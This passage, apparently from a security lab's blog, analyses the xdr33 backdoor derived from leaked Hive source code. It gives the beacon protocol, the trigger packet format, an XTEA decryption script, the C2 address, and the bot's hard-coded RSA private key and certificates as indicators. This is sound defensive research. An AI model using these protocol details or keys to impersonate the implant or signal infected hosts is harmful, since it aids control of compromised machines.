<p>These modifications to xdr33 are not very sophisticated in terms of implementation, and coupled with the fact that the vulnerability used in this spread is N-day, we tend to rule out the possibility that the CIA continued to improve on the leaked source code and consider it to be the result of a cyber attack group borrowing the leaked source code.</p>
<h1 id="vulnerability-delivery-payload">Vulnerability Delivery Payload</h1>
<p>The md5 of the Payload we captured is <code>ad40060753bc3a1d6f380a5054c1403a</code>, and its contents are shown below.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_logd.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_logd.png" class="kg-image"></a></p>
<p>The code is simple and straightforward, and its main purpose is to</p>
<ul>
<li>
<p>Download the next stage of the sample and disguise it as <code>/command/bin/hlogd</code>.</p>
</li>
<li>
<p>Install <code>logd</code> service for persistence.</p>
</li>
</ul>
<h1 id="sample-analysis">Sample analysis</h1>
<p>We captured only one sample of xdr33 for the X86 architecture, and its basic information is shown below.</p>
<pre><code>MD5:ee07a74d12c0bb3594965b51d0e45b6f
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Packer: None
</code></pre>
<p>Simply put, when xdr33 runs in the compromised device, it first decrypts all the configuration information, then checks if it has root/admin permissions, if not, it prints &#x201C;Insufficient permissions. try again... &#x201C;and exit; otherwise initialize various runtime parameters, such as C2, PORT, runtime interval, etc. Finally, the two functions beacon_start and TriggerListen are used to open the two tasks of Beacon and Trigger.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_main.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_main.png" class="kg-image"></a></p>
<p>The following article mainly analyzes the implementation of Beacon and Trigger from the perspective of binary inversion; at the same time, we also compare and analyze the source code to see what changes have occurred.</p>
<h1 id="decrypting-configuration-information">Decrypting configuration information</h1>
<p>xdr33 decodes the configuration information by the following code snippet decode_str, its logic is very simple, i.e., byte-by-byte inverse.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_decode.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_decode.png" class="kg-image"></a></p>
<p>In IDA you can see that decode_str has a lot of cross-references, 152 in total. To assist in the analysis, we implemented the IDAPython script Decode_RES in the appendix to decrypt the configuration information.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_idaxref.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_idaxref.png" class="kg-image"></a></p>
<p>The decryption results are shown below, including Beacon C2 <code>45.9.150.144</code>, runtime prompt messages, commands to view device information, etc.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_config.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_config.png" class="kg-image"></a></p>
<h1 id="beacon-task">Beacon Task</h1>
<p>The main function of Beacon is to periodically collect PID, MAC, SystemUpTime, process and network related device information; then use bzip, XTEA algorithm to compress and encrypt the device information, and report to C2; finally wait for the execution of the commands issued by C2.</p>
<h2 id="0x01-information-collection">0x01: Information Collection</h2>
<ul>
<li>
<p>MAC</p>
<p>Query MAC by <code>SIOCGIFCON</code> or <code>SIOCGIFHWADDR</code></p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_mac-1.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_mac-1.png" class="kg-image"></a></p>
</li>
<li>
<p>SystemUpTime</p>
<p>Collects system up time via /proc/uptime</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_uptime.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_uptime.png" class="kg-image"></a></p>
</li>
<li>
<p>Process and network-related information</p>
<p>Collect process, NIC, network connection, and routing information by executing the following 4 commands</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_netinfo.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_netinfo.png" class="kg-image"></a></p>
</li>
</ul>
<h2 id="0x02-information-processing">0x02: Information processing</h2>
<p>Xdr33 combines different device information through the update_msg function</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_compose.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_compose.png" class="kg-image"></a></p>
<p>In order to distinguish different device information, Hive designed ADD_HDR, which is defined as follows, and &quot;3, 4, 5, 6&quot; in the above figure represents different Header Type.</p>
<pre><code>typedef struct __attribute__ ((packed)) add_header {
	unsigned short type;
	unsigned short length;
} ADD_HDR;

</code></pre>
<p>What does &quot;3, 4, 5, 6&quot; represent exactly? This depends on the definition of Header Types in the source code below. xdr33 is extended on this basis, with two new values 0 and 9, representing <code>Sha1[:32] of MAC</code>, and <code>PID of xdr33</code> respectively</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_type.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_type.png" class="kg-image"></a></p>
<p>Some of the information collected by xdr32 in the virtual machine is shown below, and it can be seen that it contains the device information with head type 0,1,2,7,9,3.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_deviceinfo.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_deviceinfo.png" class="kg-image"></a></p>
<p>It is worth mentioning that type=0, <code>Sha1[:32] of MAC</code>, which means that it takes the first 32 bytes of MAC SHA1. Take the mac in the above figure as an example, its calculation process is as follows.</p>
<pre><code>mac:00-0c-29-94-d9-43,remove &quot;-&quot;
result:00 0c 29 94 d9 43

sha1 of mac:
result:c55c77695b6fd5c24b0cf7ccce3e464034b20805

sha1[:32] of mac:
result:c55c77695b6fd5c24b0cf7ccce3e4640
</code></pre>
<p>When all the device information is combined, use bzip to compress it and add 2 bytes of <code>beacon_header_version</code> and 2 bytes of OS information in the header.<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_devicebzip.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_devicebzip.png" class="kg-image"></a></p>
<h2 id="0x03-network-communication">0x03: Network Communication</h2>
<p>The communication process between xdr33 and Beacon C2 contains the following 4 steps, and the details of each step will be analyzed in detail below.</p>
<ul>
<li>Two-way SSL authentication</li>
<li>Obtain XTEA key</li>
<li>Report XTEA encrypted device information to C2</li>
<li>Execute the commands sent by C2</li>
</ul>
<h3 id="step1-two-way-ssl-authentication">Step1: Two-way SSL Authentication</h3>
<p>Two-way SSL authentication requires Bot and C2 to confirm each other&apos;s identity, from the network traffic level, it is obvious that Bot and C2 request each other&apos;s certificate and verify the process.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_certi.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_certi.png" class="kg-image"></a></p>
<p>The author of xdr33 uses the kaspersky.conf and thawte.conf templates in the source repository to generate the required Bot certificate, C2 certificate and CA certificate.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_certconf.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_certconf.png" class="kg-image"></a></p>
<p>The CA certificate, Bot certificate and PrivKey are hardcoded in xdr32 in DER format.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_sslsock.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_sslsock.png" class="kg-image"></a></p>
<p>The Bot certificate can be viewed using <code>openssl x509 -in Cert -inform DER -noout -text</code>, where CN=xdr33, which is where the family name comes from.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_botcert.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_botcert.png" class="kg-image"></a></p>
<p>You can use <code>openssl s_client -connect 45.9.150.144:443</code> to see the C2 certificate. bot, C2 certificates are disguised as being related to kaspersky, reducing the suspiciousness of network traffic in this way.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_c2cert.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_c2cert.png" class="kg-image"></a></p>
<p>The CA certificates are shown below. From the validity of the 3 certificates, we presume that the start of this activity is after 2022.10.7.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_ca.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_ca.png" class="kg-image"></a></p>
<h3 id="step2-obtain-xtea-key">Step2: Obtain XTEA key</h3>
<p>After establishing SSL communication between Bot and C2, Bot requests XTEA key from C2 via the following code snippet.<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_teakey.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_teakey.png" class="kg-image"></a></p>
<p>The processing logic is.</p>
<ol>
<li>
<p>Bot sends 64 bytes of data to C2 in the format of &quot;length of device information length string (xor 5) + device information length string (xor 5) + random data&quot;.</p>
</li>
<li>
<p>Bot receives 32 bytes of data from C2 and gets 16 bytes of XTEA KEY from it, the equivalent python code to get the KEY is as follows.</p>
<pre><code>XOR_KEY=5
def get_key(rand_bytes):
	offset = (ord(rand_bytes[0]) ^ XOR_KEY) % 15
	return  rand_bytes[(offset+1):(offset+17)]
</code></pre>
</li>
</ol>
<h3 id="step3-report-xtea-encrypted-device-information-to-c2">Step3: Report XTEA encrypted device information to C2</h3>
<p>Bot uses the XTEA KEY obtained from Step2 to encrypt the device information and report it to C2. since the device information is large, it usually needs to be sent in chunks, Bot sends up to 4052 bytes at a time, and C2 replies with the number of bytes it has accepted.<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_teadevice.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_teadevice.png" class="kg-image"></a></p>
<p>It is also worth mentioning that XTEA encryption is only used in Step3, and the subsequent Step4 only uses the SSL-negotiated encryption suite for network traffic, and no longer uses XTEA.</p>
<h3 id="step4-waiting-for-execution-command-new-function-added-by-xdr33">Step4: Waiting for execution command (new function added by xdr33)</h3>
<p>After the device information is reported, C2 sends 8 bytes of task number N of this cycle to Bot, if N is equal to 0, it will sleep for a certain time and enter the next cycle of Beacon Task; if not, it will send 264 bytes of task. bot receives the task, parses it, and executes the corresponding instruction.<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_beaconwaitcmd.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_beaconwaitcmd.png" class="kg-image"></a></p>
<p>The supported instructions are shown in the following table.</p>
<table>
<thead>
<tr>
<th>Index</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x01</td>
<td>Download File</td>
</tr>
<tr>
<td>0x02</td>
<td>Execute CMD with fake name &quot;[kworker/3:1-events]&quot;</td>
</tr>
<tr>
<td>0x03</td>
<td>Update</td>
</tr>
<tr>
<td>0x04</td>
<td>Upload File</td>
</tr>
<tr>
<td>0x05</td>
<td>Delete</td>
</tr>
<tr>
<td>0x08</td>
<td>Launch Shell</td>
</tr>
<tr>
<td>0x09</td>
<td>Socket5 Proxy</td>
</tr>
<tr>
<td>0x0b</td>
<td>Update BEACONINFO</td>
</tr>
</tbody>
</table>
<h2 id="network-traffic-example">Network Traffic Example</h2>
<h3 id="the-actual-step2-traffic-generated-by-xdr33">The actual step2 traffic generated by xdr33</h3>
<p><a href="https://blog.netlab.360.com/content/images/2023/01/hive_packet.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_packet.png" class="kg-image"></a></p>
<h3 id="the-interaction-in-step3-and-the-traffic-from-step4">The interaction in step3, and the traffic from step4</h3>
<p><a href="https://blog.netlab.360.com/content/images/2023/01/hive_packetB.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_packetB.png" class="kg-image"></a></p>
<h3 id="what-information-can-we-get-from-this%EF%BC%9F">What information can we get from this?&#xFF1F;</h3>
<ol>
<li>
<p>The length of the device information length string, <code>0x1 ^ 0x5 = 0x4</code></p>
</li>
<li>
<p>The length of the device information, 0x31,0x32,0x37,0x35 respectively xor 5 gives 4720</p>
</li>
<li>
<p>tea key <code>2E 09 9B 08 CF 53 BE E7 A0 BE 11 42 31 F4 45 3A</code></p>
</li>
<li>
<p>C2 will confirm the length of the device information reported by the BOT, 4052+668 = 4720, which corresponds to the second point</p>
</li>
<li>
<p>The number of tasks in this cycle is <code>00 00 00 00 00 00 00</code>, i.e. there is no task, so no specific task of 264 bytes will be issued.</p>
</li>
</ol>
<p>The encrypted device information can be decrypted by the following code, and the decrypted data is <code>00 22 00 14 42 5A 68 39</code>, which contains the <code>beacon_header_version + os + bzip magic</code>, and the previous analysis can correspond to one by one.</p>
<pre><code>import hexdump
import struct

def xtea_decrypt(key,block,n=32,endian=&quot;!&quot;):
    v0,v1 = struct.unpack(endian+&quot;2L&quot;, block)
    k = struct.unpack(endian+&quot;4L&quot;,key)
    delta,mask = 0x9e3779b9,0xffffffff
    sum = (delta * n) &amp; mask
    for round in range(n):
        v1 = (v1 - (((v0&lt;&lt;4 ^ v0&gt;&gt;5) + v0) ^ (sum + k[sum&gt;&gt;11 &amp; 3]))) &amp; mask
        sum = (sum - delta) &amp; mask
        v0 = (v0 - (((v1&lt;&lt;4 ^ v1&gt;&gt;5) + v1) ^ (sum + k[sum &amp; 3]))) &amp; mask
    return struct.pack(endian+&quot;2L&quot;,v0,v1)

def decrypt_data(key,data):
    size = len(data)
    i = 0
    ptext = b&apos;&apos;
    while i &lt; size:
        if size - i &gt;= 8:
            ptext += xtea_decrypt(key,data[i:i+8])
        i += 8
    return ptext
key=bytes.fromhex(&quot;&quot;&quot;
2E 09 9B 08 CF 53 BE E7  A0 BE 11 42 31 F4 45 3A
&quot;&quot;&quot;)
enc_buf=bytes.fromhex(&quot;&quot;&quot;
65 d8 b1 f9 b8 37 37 eb
&quot;&quot;&quot;)

hexdump.hexdump(decrypt_data(key,enc_buf))
</code></pre>
<h1 id="trigger-task">Trigger Task</h1>
<p>The main function of the Trigger is to listen to all traffic and wait for the Triggger IP message in a specific format. Once the message and the Trigger Payload hidden in the message pass the layers of verification, the Bot establishes communication with the C2 in the Trigger Payload and waits for the execution of the instructions sent.</p>
<h2 id="0x1-listening-for-traffic">0x1: Listening for traffic</h2>
<p>Use the function call <code>socket( PF_PACKET, SOCK_RAW, htons( ETH_P_IP ) )</code> to set RAW SOCKET to capture IP messages, and then the following code snippet to process IP messages, you can see that Tirgger supports TCP,UDP and the maximum length of message Payload is 472 bytes. This kind of traffic sniffing implementation will increase the CPU load, in fact using BPF-Filter on sockets will work better.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_snfpkt.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_snfpkt.png" class="kg-image"></a></p>
<h2 id="0x2-checksum-trigger-packets">0x2: Checksum Trigger packets</h2>
<p>TCP and UDP messages that meet the length requirement are further verified using the same check_payload function.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_handxref.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_handxref.png" class="kg-image"></a></p>
<p><strong>check_payload</strong>&#x7684;&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#x6240;&#x793A;:<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_checkpayload.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_checkpayload.png" class="kg-image"></a></p>
<p>The processing logic can be seen as follows.</p>
<ul>
<li>Use CRC16/CCITT-FALSE algorithm to calculate the CRC16 value of offset 8 to 92 in the message to get crcValue</li>
<li>The offset value of crcValue in the message is obtained by crcValue % 200+ 92, crcOffset</li>
<li>Verify whether the data at crcOffset in the message is equal to crcValue, if it is equal, go to the next step</li>
<li>Check if the data at crcOffset+2 in the message is an integer multiple of 127, if yes, go to the next step</li>
<li>Trigger_Payload is encrypted, the starting position is crcOffset+12, the length is 29 bytes. the starting position of Xor_Key is crcValue%55+8, XOR the two byte by byte, we get Trigger_Paylaod</li>
</ul>
<p>So far it can be determined that the <code>Trigger message format</code> is as follows</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggerpkt-1.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggerpkt-1.png" class="kg-image"></a></p>
<h2 id="0x3-checksum-trigger-payload">0x3:  Checksum Trigger Payload</h2>
<p>If the Trigger message passes the checksum, the check_trigger function continues to check the Trigger Payload</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfinal.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfinal.png" class="kg-image"></a></p>
<p>The processing logic can be seen as follows</p>
<ul>
<li>Take the last 2 bytes of the Trigger Payload and write it as crcRaw</li>
<li>Set the last 2 bytes of the Trigger Payload to 0 and calculate its CRC16, which is called crcCalc</li>
<li>Compare crcRaw and crcCalc, if they are equal, it means that the Trigger Payload is structurally valid.</li>
</ul>
<p>Next, the SHA1 of the key in the Trigger Payload is calculated and compared with the hard-coded SHA1 <code>46a3c308401e03d3195c753caa14ef34a3806593</code> in the Bot. If it is equal, it means that the Trigger Payload is also valid in content, so we can go to the last step, establish communication with C2 in the Trigger Payload, and wait for the execution of its issued command.</p>
<p>The format of the <code>Trigger Payload</code> can be determined as follows.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfmt-1.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfmt-1.png" class="kg-image"></a></p>
<h2 id="0x4-execution-of-trigger-c2s-command">0x4: Execution of Trigger C2&apos;s command</h2>
<p>After a Trigger message passes the checksum, the Bot actively communicates with the C2 specified in the Trigger Payload and waits for the execution of the instructions issued by the C2.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggercmd.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggercmd.png" class="kg-image"></a></p>
<p>The supported instructions are shown in the following table.</p>
<table>
<thead>
<tr>
<th>Index</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00,0x00a</td>
<td>Exit</td>
</tr>
<tr>
<td>0x01</td>
<td>Download File</td>
</tr>
<tr>
<td>0x02</td>
<td>Execute CMD</td>
</tr>
<tr>
<td>0x04</td>
<td>Upload File</td>
</tr>
<tr>
<td>0x05</td>
<td>Delete</td>
</tr>
<tr>
<td>0x06</td>
<td>Shutdown</td>
</tr>
<tr>
<td>0x08</td>
<td>Launch SHELL</td>
</tr>
<tr>
<td>0x09</td>
<td>SOCKET5 PROXY</td>
</tr>
<tr>
<td>0x0b</td>
<td>Update BEACONINFO</td>
</tr>
</tbody>
</table>
<p>It is worth noting that Trigger C2 differs from Beacon C2 in the details of communication; after establishing an SSL tunnel, Bot and Trigger C2 use a Diffie-Helllman key exchange to establish a shared key, which is used in the AES algorithm to create a second layer of encryption.<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_aes.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_aes.png" class="kg-image"></a></p>
<h1 id="experiment">Experiment</h1>
<p>To verify the correctness of the reverse analysis of the Trigger part, we Patch the SHA1 value of xdr33, fill in the SHA1 of <code>NetlabPatched,Enjoy!</code> and implement the GenTrigger code in the appendix to generate UDP type Trigger messages.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_patchbylab.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_patchbylab.png" class="kg-image"></a></p>
<p>We run the Patch in the virtual machine <code>192.168.159.133</code> after the xdr33 sample, the construction of C2 for <code>192.168.159.128:6666</code> Trigger Payload, and sent to 192.168.159.133 in the form of UDP. the final result is as follows, you can see the xdr33 in the implanted host after receiving the UDP Trigger message, and we expected the same, launched a communication request to the preset Trigger C2, Cool!</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_vmware.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_vmware.png" class="kg-image"></a></p>
<h1 id="contact-us">Contact us</h1>
<p>Readers are always welcomed to reach us on <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com">twitter</a> or email us to netlab[at]360.cn.</p>
<h1 id="ioc">IOC</h1>
<h2 id="sample">sample</h2>
<pre><code>ee07a74d12c0bb3594965b51d0e45b6f

patched sample

af5d2dfcafbb23666129600f982ecb87
</code></pre>
<h2 id="c2">C2</h2>
<pre><code>45.9.150.144:443
</code></pre>
<h2 id="bot-private-key">BOT Private Key</h2>
<pre><code>-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA6XthqPjU3XFu8/4PMVQ4iqJbleXmXhbVWMPhY/sTndEcO5vQ
mIMNJc1mISZTNPzddXSrj0h9GJe0ix0CIZID3bHyZHLiqb/ewylFmqSOVkviG/Je
o17UAqhsNGpVu/l8FM3qCHJE7z+wBqHdwVIZMt9vLaLti2KyJV+j1F1GTk8X2jcI
4DnnVKJE81rSafzaX2JBc6J6hovFMMP9IGb2LwRQMZNtZqSus6JMolhkO0dtvxXK
yTm1k79HL3PlZdgKt6HJFoukwkWND8NNTbcBXDWWDdJ42g/1I0Z7tMkdKFgfjUut
90LXKRRuENcUrbi75L6P2FRwPnqvVv+3N25MZQIDAQABAoIBADtguG57kc8bWQdO
NljqPVLshXQyuop1Lh7b+gcuREffdVmnf745ne9eNDn8AC86m6uSV0siOUY21qCG
aRNWigsohSeMnB5lgGaLqXrxnI1P0RogYncT18ExSgtue41Jnoe/8mPhg6yAuuiE
49uVYHkyn5iwlc7b88hTcVvBuO6S7HPqqXbDEBSoKL0o60/FyPb0RKigprKooTo/
KVCRFDT6xpAGMnjZkSSBJB2cgRxQwkcyghMcLJBvsZXbYNihiXiiiwaLvk4ZeBtf
0hnb6Cty840juAIGKDiUELijd3JtVKaBy41KLrdsnC+8JU3RIVGPtPDbwGanvnCk
Ito7gqUCgYEA+MucFy8fcFJtUnOmZ1Uk3AitLua+IrIEp26IHgGaMKFA0hnGEGvb
ZmwkrFj57bGSwsWq7ZSBk8yHRP3HSjJLZZQIcnnTCQxHMXa+YvpuEKE5mQSMwnlu
YH9S2S0xQPi1yLQKjAVVt+zRuuJvMv0dOZAOfdib+3xesPv2fIBu0McCgYEA8D4/
zygeF5k4Omh0l235e08lkqLtqVLu23vJ0TVnP2LNh4rRu6viBuRW7O9tsFLng8L8
aIohdVdF/E2FnNBhnvoohs8+IeFXlD8ml4LC+QD6AcvcMGYYwLIzewODJ2d0ZbBI
hQthoAw9urezc2CLy0da7H9Jmeg26utwZJB4ZXMCgYEAyV9b/rPoeWxuCd+Ln3Wd
+O6Y5i5jVQfLlo1zZP4dBCFwqt2rn5z9H0CGymzWFhq1VCrT96pM2wkfr6rNBHQC
7LvNvoJ2WotykEmxPcG/Fny4du7k03+f5EEKGLhodlMYJ9P5+W1T/SOUefRO1vFi
FzZPVHLfhcUbi5rU3d7CUv8CgYBG82tu578zYvnbLhw42K7UfwRusRWVazvFsGJj
Ge17J9fhTtswHMwtEuSlJvTzHRjorf5TdW/6MqMlp1Ntg5FBHUo4vh3wbZeq3Zet
KV4hoesz+pv140EuL7LKgrgKPCCBI7XXLQxQ8yyL51LlIT9H8rPkopb/EDif2paf
7JbSBwKBgCY8+aO44uuR2dQm0SIUqnb0MigLRs1qcWIfDfHF9K116sGwSK4SD9vD
poCA53ffcrTi+syPiUuBJFZG7VGfWiNJ6GWs48sP5dgyBQaVq5hQofKqQAZAQ0f+
7TxBhBF4n2gc5AhJ3fQAOXZg5rgNqhAln04UAIlgQKO69fAvfzID
-----END RSA PRIVATE KEY-----

</code></pre>
<h2 id="bot-certificate">BOT Certificate</h2>
<pre><code>-----BEGIN CERTIFICATE-----
MIIFJTCCBA2gAwIBAgIBAzANBgkqhkiG9w0BAQsFADCBzjELMAkGA1UEBhMCWkEx
FTATBgNVBAgMDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBwwJQ2FwZSBUb3duMR0wGwYD
VQQKDBRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UECwwfQ2VydGlmaWNhdGlv
biBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAwwYVGhhd3RlIFByZW1pdW0gU2Vy
dmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNlcnZlckB0aGF3dGUuY29t
MB4XDTIyMTAwNzE5NTAwN1oXDTIzMDMxNjE5NTAwN1owgYExCzAJBgNVBAYTAlJV
MR0wGwYDVQQKDBRLYXNwZXJza3kgTGFib3JhdG9yeTEUMBIGA1UEAwwLRW5naW5l
ZXJpbmcxDjAMBgNVBAMMBXhkcjMzMQ8wDQYDVQQIDAZNb3Njb3cxDzANBgNVBAcM
Bk1vc2NvdzELMAkGA1UECwwCSVQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQDpe2Go+NTdcW7z/g8xVDiKoluV5eZeFtVYw+Fj+xOd0Rw7m9CYgw0lzWYh
JlM0/N11dKuPSH0Yl7SLHQIhkgPdsfJkcuKpv97DKUWapI5WS+Ib8l6jXtQCqGw0
alW7+XwUzeoIckTvP7AGod3BUhky328tou2LYrIlX6PUXUZOTxfaNwjgOedUokTz
WtJp/NpfYkFzonqGi8Uww/0gZvYvBFAxk21mpK6zokyiWGQ7R22/FcrJObWTv0cv
c+Vl2Aq3ockWi6TCRY0Pw01NtwFcNZYN0njaD/UjRnu0yR0oWB+NS633QtcpFG4Q
1xStuLvkvo/YVHA+eq9W/7c3bkxlAgMBAAGjggFXMIIBUzAMBgNVHRMBAf8EAjAA
MB0GA1UdDgQWBBRc0LAOwW4C6azovupkjX8R3V+NpjCB+wYDVR0jBIHzMIHwgBTz
BcGhW/F2gdgt/v0oYQtatP2x5aGB1KSB0TCBzjELMAkGA1UEBhMCWkExFTATBgNV
BAgMDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBwwJQ2FwZSBUb3duMR0wGwYDVQQKDBRU
aGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UECwwfQ2VydGlmaWNhdGlvbiBTZXJ2
aWNlcyBEaXZpc2lvbjEhMB8GA1UEAwwYVGhhd3RlIFByZW1pdW0gU2VydmVyIENB
MSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNlcnZlckB0aGF3dGUuY29tggEAMA4G
A1UdDwEB/wQEAwIF4DAWBgNVHSUBAf8EDDAKBggrBgEFBQcDAjANBgkqhkiG9w0B
AQsFAAOCAQEAGUPMGTtzrQetSs+w12qgyHETYp8EKKk+yh4AJSC5A4UCKbJLrsUy
qend0E3plARHozy4ruII0XBh5z3MqMnsXcxkC3YJkjX2b2EuYgyhvvIFm326s48P
o6MUSYs5CFxhhp/N0cqmqGgZL5V5evI7P8NpPcFhs7u1ryGDcK1MTtSSPNPy3F+c
d707iRXiRcLQmXQTcjmOVKrohA/kqqtdM5EUl75n9OLTinZcb/CQ9At+5Sn91AI3
ngd22cyLLC3O4F14L+hqwMd0ENSjanX38iZ2EY8hMpmNYwPOVSQZ1FpXqrkW1ArI
lHEtKB3YMeSXQHAsvBQD0AlW7R7JqHdreg==
-----END CERTIFICATE-----

</code></pre>
<h2 id="ca-certificate">CA Certificate</h2>
<pre><code>-----BEGIN CERTIFICATE-----
MIIFXTCCBEWgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBzjELMAkGA1UEBhMCWkEx
FTATBgNVBAgMDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBwwJQ2FwZSBUb3duMR0wGwYD
VQQKDBRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UECwwfQ2VydGlmaWNhdGlv
biBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAwwYVGhhd3RlIFByZW1pdW0gU2Vy
dmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNlcnZlckB0aGF3dGUuY29t
MB4XDTIyMTAwNzE0MTEzOFoXDTQ3MTAwMTE0MTEzOFowgc4xCzAJBgNVBAYTAlpB
MRUwEwYDVQQIDAxXZXN0ZXJuIENhcGUxEjAQBgNVBAcMCUNhcGUgVG93bjEdMBsG
A1UECgwUVGhhd3RlIENvbnN1bHRpbmcgY2MxKDAmBgNVBAsMH0NlcnRpZmljYXRp
b24gU2VydmljZXMgRGl2aXNpb24xITAfBgNVBAMMGFRoYXd0ZSBQcmVtaXVtIFNl
cnZlciBDQTEoMCYGCSqGSIb3DQEJARYZcHJlbWl1bS1zZXJ2ZXJAdGhhd3RlLmNv
bTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMfHJIl4/Xdo896Rlyqr
3VcKnLAAqIJkpgl90Z6bxUDpwa41H3ZDa7As4ZO9xa+lXGn9XB9u34TqJPkyhSKg
3wYK02KTCwVMI/gf506KpFvocTHpScnXs0xUoxsM8qEiDV2pTe447rmyaLyWcT5d
hbzkPl0WuDmEWMhfC2R9z4+mlsbwMAy9PN/JYzxz7cR48qj4j9hhEwkJ1+yJKXBV
AV9CdgLYfJXrA7A4Hxgc0ECKJmpovskv/DlxM8RxOsHfVtyG4ZgqmRraxUelirlf
tLj0fIkLaP7xvo1QSgiqQffbBOiDg9PN3H2wezFOmeDg9RIR6qvhzhyNpZjANiiC
JzMCAwEAAaOCAUIwggE+MA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPMFwaFb
8XaB2C3+/ShhC1q0/bHlMIH7BgNVHSMEgfMwgfCAFPMFwaFb8XaB2C3+/ShhC1q0
/bHloYHUpIHRMIHOMQswCQYDVQQGEwJaQTEVMBMGA1UECAwMV2VzdGVybiBDYXBl
MRIwEAYDVQQHDAlDYXBlIFRvd24xHTAbBgNVBAoMFFRoYXd0ZSBDb25zdWx0aW5n
IGNjMSgwJgYDVQQLDB9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSEw
HwYDVQQDDBhUaGF3dGUgUHJlbWl1bSBTZXJ2ZXIgQ0ExKDAmBgkqhkiG9w0BCQEW
GXByZW1pdW0tc2VydmVyQHRoYXd0ZS5jb22CAQAwDgYDVR0PAQH/BAQDAgGGMA0G
CSqGSIb3DQEBCwUAA4IBAQDBqNA1WFp15AM8l7oDgqa/YHvoGmfcs48Ak8YtrDEF
tLRyz1+hr/hhfR8Hm1hZ0oj1vAzayhCGKdQTk42mq90dG4tViNYMq4mFKmOoVnw6
